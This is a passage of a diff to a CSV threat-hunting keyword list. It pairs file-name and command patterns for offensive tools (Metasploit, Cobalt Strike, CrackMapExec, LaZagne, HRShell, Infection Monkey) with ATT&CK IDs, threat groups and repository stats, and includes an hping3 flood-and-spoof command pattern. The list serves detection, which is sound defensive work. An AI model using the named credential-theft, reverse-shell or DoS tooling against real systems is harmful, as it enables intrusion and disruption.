-"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*hook-lsassy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-pypykatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*HOST/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*Host: FUZZ.machine.org*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*HostEnum.ps1*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z"
-"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
-"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*houqingv1.0.zip*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z"
-"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
-"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
 "*hping3 * --flood --frag --spoof * --destport*","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*HRShell*client.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*HRShell*server.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*HtaPowershellGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*hta-to-javascript-crypter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*HtaVBSGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*html/js/beacons.js*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*html/scripts/merlin.js*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Html-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*Html-Injection-Read-File-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*HTMLSmuggler-main*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" -"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*htrgouvea/nipe*","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" "*htshells-master*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http* | hakrawler -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
